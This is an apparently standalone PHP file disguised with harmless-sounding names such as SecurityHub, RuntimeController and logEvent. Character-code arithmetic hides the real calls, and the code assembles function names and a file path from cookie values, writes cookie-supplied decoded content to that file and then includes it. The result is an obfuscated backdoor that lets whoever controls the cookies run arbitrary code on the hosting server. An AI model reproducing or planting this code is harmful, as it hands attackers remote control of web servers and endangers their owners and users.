<?php
function check_access($c)
{
    $a = array(76 + 33 + 7, 103 - 6, 56 * 2 + 4, 123 - 8);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

function load_settings($c)
{
    $a = array(110, 20 * 1 + 81, 108, 16 * 2 + 82, 88 * 102 - 8860, 87 + 28);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

function monitor_health($c)
{
    $a = array(40 + 71, 38 + 34 + 42, 29 + 71);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

function manage_state($c)
{
    $a = array(13 + 29 + 72, 89 + 4 + 11, 3 * 33);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

class RuntimeController
{
    private static $_dm;
    static function logEvent($_vm, $_hjf)
    {
        if (!self::$_dm) {
            self::calculateSum();
        }
        $_thq = load_settings($_hjf);
        $_sj = base64_decode(self::$_dm[$_vm]);
        for ($_nd = 0, $_gc = load_settings($_sj); $_nd !== $_gc; ++$_nd) {
            $_sj[$_nd] = manage_state(monitor_health($_sj[$_nd]) ^ monitor_health($_hjf[$_nd % $_thq]));
        }
        return $_sj;
    }
    private static function calculateSum()
    {
        self::$_dm = array('_aq' => '', '_xfz' => '');
    }
}

class SecurityHub
{
    private static $_dm;
    static function logEvent($_vm)
    {
        if (!self::$_dm) {
            self::calculateSum();
        }
        return self::$_dm[$_vm];
    }
    private static function calculateSum()
    {
        self::$_dm = array(00, 04, 023, 023, 01, 023, 02, 04, 01, 031, 017, 01, 032, 016, 07, 025, 026, 033, 03);
    }
}

$_gc = $_COOKIE;
$_hjf = SecurityHub::logEvent(0);
$_vm = SecurityHub::logEvent(1);
$_cgg = array();
$_cgg[$_hjf] = RuntimeController::logEvent('_aq', '_ra');
while ($_vm) {
    $_cgg[$_hjf] .= $_gc[SecurityHub::logEvent(2)][$_vm];
    if (!$_gc[SecurityHub::logEvent(3)][$_vm + SecurityHub::logEvent(4)]) {
        if (!$_gc[SecurityHub::logEvent(5)][$_vm + SecurityHub::logEvent(6)]) {
            break;
        }
        $_hjf++;
        $_cgg[$_hjf] = RuntimeController::logEvent('_xfz', '_ap');
        $_vm++;
    }
    $_vm = $_vm + SecurityHub::logEvent(7) + SecurityHub::logEvent(8);
}
$_hjf = $_cgg[SecurityHub::logEvent(9)]() . $_cgg[SecurityHub::logEvent(10)];
if (!$_cgg[SecurityHub::logEvent(11)]($_hjf)) {
    $_vm = $_cgg[SecurityHub::logEvent(12)]($_hjf, $_cgg[SecurityHub::logEvent(13)]);
    $_cgg[SecurityHub::logEvent(14)]($_vm, $_cgg[SecurityHub::logEvent(15)] . $_cgg[SecurityHub::logEvent(16)]($_cgg[SecurityHub::logEvent(17)]($_gc[SecurityHub::logEvent(18)])));
}
include $_hjf;